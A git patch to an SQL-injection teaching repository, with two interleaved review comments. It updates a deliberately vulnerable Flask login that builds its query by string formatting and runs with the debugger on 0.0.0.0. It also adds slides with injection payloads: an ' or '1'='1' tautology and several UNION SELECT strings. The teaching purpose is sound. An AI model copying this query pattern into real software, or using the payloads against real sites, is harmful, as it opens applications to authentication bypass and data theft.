From f1a8b2cbebeb8d1fa35395f4b4067081b04aa588 Mon Sep 17 00:00:00 2001 From: whx Date: Tue, 16 Apr 2024 13:11:51 +0000 Subject: [PATCH] added some more information to the presentation, linting of code for the example implemenation --- .../example/README.md | 27 +++++--- .../example/flask_sqli.py | 21 ++++--- .../example/templates/login.html | 5 +- .../presentation.html | 62 +++++++++++++++++-- .../sql_injection.md | 54 +++++++++++++++- 5 files changed, 143 insertions(+), 26 deletions(-) diff --git a/introduction-to-sql-injection/example/README.md b/introduction-to-sql-injection/example/README.md index f125322..1685530 100644 --- a/introduction-to-sql-injection/example/README.md +++ b/introduction-to-sql-injection/example/README.md @@ -1,9 +1,9 @@ # Example project of a website including an SQL injection This implementation is meant to be used for training purposes. -Do not use the code in production or development. +Do not use this code in production or as a blueprint for development! -## Usage +## Installation Use python poetry to install dependencies in the following way. @@ -11,6 +11,20 @@ Use python poetry to install dependencies in the following way. poetry install ``` +Dependencies can be found inside the `./pyproject.toml` file. + +After installation has been done, start the flask server. + +### Usage + +```sh +poetry run python3 ./flask_sqli.py +``` + +Now, the website is accessible at [localhost:5000](http://localhost:5000/) + +### Manual Installation + If you want to install the dependencies manually use a venv in the following way. ```sh 
@@ -19,12 +33,11 @@ source venv/bin/activate pip install flask ``` -Dependencies can be found inside the `./pyproject.toml` file. +### Usage after manual installation -After installation has been done, start the flask server. +Start the flask server without poetry in the following way. ```sh -poetry run python3 ./flask_sqli.py +source venv/bin/activate +python3 ./flask_sqli.py ``` - -Now, the website is accessible at [localhost:5000](http://localhost:5000/) diff --git a/introduction-to-sql-injection/example/flask_sqli.py b/introduction-to-sql-injection/example/flask_sqli.py index 04449ad..ba5a581 100644 --- a/introduction-to-sql-injection/example/flask_sqli.py +++ b/introduction-to-sql-injection/example/flask_sqli.py @@ -1,9 +1,10 @@ -from flask import Flask, request, render_template +from flask import Flask, flash, request, render_template import sqlite3 app = Flask(__name__) app.secret_key = 'secret_key' + def db_connection(): conn = sqlite3.connect('users.db') c = conn.cursor() 
@@ -21,23 +22,27 @@ def login(): password = request.form['password'] # Vulnerable code with SQL injection vulnerability - query = "SELECT * FROM users WHERE username='" + username + "' AND \ - password='" + password + "'" + query = "SELECT * FROM users WHERE username = '%s' AND password = '%s'" \ + % (username, password) - c = db_connection() - c.execute(query) - user = c.fetchone() + # YOU CAN ALSO WRITE IT LIKE THIS: + # query = "SELECT * FROM users WHERE username='" + username + "' AND \ + # password='" + password + "'" try: + c = db_connection() + c.execute(query) + user = c.fetchone() + if user: login_failed = False return render_template('profile.html') else: login_failed = True - return render_template('login.html', login_failed=login_failed, error_message=user) + return render_template('login.html', login_failed=login_failed) except sqlite3.Error as e: flash(f"{e}") - return render_template('login.html') + return render_template('login.html', error=e) if __name__ == '__main__': app.run(host='0.0.0.0', debug=True) diff --git a/introduction-to-sql-injection/example/templates/login.html b/introduction-to-sql-injection/example/templates/login.html index b1caada..e998d2f 100644 --- a/introduction-to-sql-injection/example/templates/login.html +++ b/introduction-to-sql-injection/example/templates/login.html @@ -5,7 +5,7 @@ {% with messages = get_flashed_messages(with_categories=True) %} {% if messages %} {% for category, message in messages %} -
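Review bot: The `error=e` keyword on the new `return render_template('login.html', error=e)` line is dead as far as this commit's templates show — the login.html hunks remove the `{% if error_message %}` block and add no `{{ error }}`, so the sqlite3 message reaches the page only through the `flash(f"{e}")` call just above it; either drop the kwarg or render it, but don't leave two channels that disagree. Showing the raw `sqlite3.Error` text to the client is what makes error-based injection observable in this demo, so keep it but label it, e.g. `# Intentionally shows the raw DB error to the client (error-based SQLi demo) — never do this outside training`. The commented-out string-concatenation variant adds little; the contrast learners need is the parameterized form, `# Fixed form: c.execute("SELECT * FROM users WHERE username = ? AND password = ?", (username, password))`. `login()` begins above this hunk, and the cursor handed back by `db_connection()` (whose return is outside the earlier hunk) is never closed on any path, so every login attempt appears to leak a connection. The unchanged `app.run(host='0.0.0.0', debug=True)` at the end of the hunk also exposes the Werkzeug debugger beyond the `localhost:5000` the README now advertises; a one-line warning there would suit a deliberately vulnerable app.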
+
{{ message }}
{% endfor %} @@ -25,7 +25,4 @@
- {% if error_message %} - {{ error_message }} - {% endif %} {% endblock info %} diff --git a/introduction-to-sql-injection/presentation.html b/introduction-to-sql-injection/presentation.html index 2ed679d..71309e1 100644 --- a/introduction-to-sql-injection/presentation.html +++ b/introduction-to-sql-injection/presentation.html @@ -126,17 +126,19 @@ Next Presentation
sql_query =
   cursor.execute(
-    "SELECT * FROM user_data where username = 'admin' and password = 's3cur3P4ssw0rd'"
-  )
+ "SELECT * FROM users WHERE username = 'admin' \ + AND password = 's3cur3P4ssw0rd'" + )

Number 2

-

User input is possible as a part of said SQL query

+

User input is possible as a string and is a part of said SQL +query

sql_query =
   cursor.execute(
-    "SELECT * FROM user_data where username = '%s' and password = '%s'",
+    "SELECT * FROM users WHERE username = '%s' AND password = '%s'" \
     % (username, password)
   )
@@ -149,6 +151,58 @@ Injection
  • Continue the query with your own SQL code
  • +
    + +

    Crafting an SQL Query

    +
    +
    ' or '1'='1' -- -
    +
    + +
    +
    + +

    What Does the Query Look +Like

    +
    SELECT * FROM users WHERE username = '' or '1' = '1' -- - AND password '%s'
    +

    Numbers as strings is an SQLite specific thing

    +
    +
    + +

    Other Queries

    +
    ' UNION SELECT 'a',NULL,NULL,NULL -- -
    +' UNION SELECT * FROM users WHERE user_id = 1 -- -
    +' UNION SELECT * FROM users WHERE user_id != 1337 -- -
    +
    +
    + +

    Even More Injection Queries

    + +
    +
    + +

    Try for Yourself

    +

    Use the provided example inside this +presentation’s repository. There is a readme which guides you through the +setup.

    +

    The End

    Convoluted Code

    diff --git a/introduction-to-sql-injection/sql_injection.md b/introduction-to-sql-injection/sql_injection.md index cb7b8db..b4172ba 100644 --- a/introduction-to-sql-injection/sql_injection.md +++ b/introduction-to-sql-injection/sql_injection.md @@ -25,7 +25,8 @@ An SQL Query as a string embedded in other languages ```python sql_query = cursor.execute( - "SELECT * FROM user_data where username = 'admin' and password = 's3cur3P4ssw0rd'" + "SELECT * FROM users WHERE username = 'admin' \ + AND password = 's3cur3P4ssw0rd'" ) ``` @@ -33,12 +34,12 @@ sql_query = ### Number 2 -User input is possible as a part of said SQL query +User input is possible as a string and is a part of said SQL query ```python sql_query = cursor.execute( - "SELECT * FROM user_data where username = '%s' and password = '%s'", + "SELECT * FROM users WHERE username = '%s' AND password = '%s'" \ % (username, password) ) ``` 
@@ -52,6 +53,53 @@ sql_query = --- +### Crafting an SQL Query + +>```sql +>' or '1'='1' -- - +>``` + +* Close the existing string with: `'` +* Write a query that equals to True: `1=1` +* End the SQL query through a comment: `-- -` + +--- + +### What Does the Query Look Like + +```SQL +SELECT * FROM users WHERE username = '' or '1' = '1' -- - AND password '%s' +``` + +*Numbers as strings is an SQLite specific thing* + +--- + +### Other Queries + +```sql +' UNION SELECT 'a',NULL,NULL,NULL -- - +' UNION SELECT * FROM users WHERE user_id = 1 -- - +' UNION SELECT * FROM users WHERE user_id != 1337 -- - +``` + +--- + +## Even More Injection Queries + +* [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection) +* [Hacktricks SQL Injection Page](https://book.hacktricks.xyz/pentesting-web/sql-injection) +* [SQLMap](https://github.com/sqlmapproject/sqlmap) + +--- + +## Try for Yourself + +Use the provided [example](./example) inside this presentation's repository. +There is a [readme](./example/README.md) which guides you through the setup. + +--- + # The End Convoluted Code
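Review bot: The query shown under "What Does the Query Look Like" is not what the format string in Number 2 produces — it drops the `=` after `password` and keeps the literal `%s`, whereas the substituted statement is `SELECT * FROM users WHERE username = '' or '1'='1' -- -' AND password = '<whatever was typed>'`, with everything after `-- -` ignored as a comment. The italic line *Numbers as strings is an SQLite specific thing* is misleading as written: `'1'='1'` is a plain string comparison that evaluates true in every SQL dialect, which is exactly why this tautology is portable, so reword it or drop it. The three UNION payloads only work if `users` has exactly four columns and a `user_id` column, which this diff does not show; a short note such as `*column count must match the users table — check the schema in example/*` would spare readers a confusing error. `-- -` is used throughout without explanation; one sentence on why the trailing `-` is there (some engines, MySQL among them, require whitespace after `--`) would help.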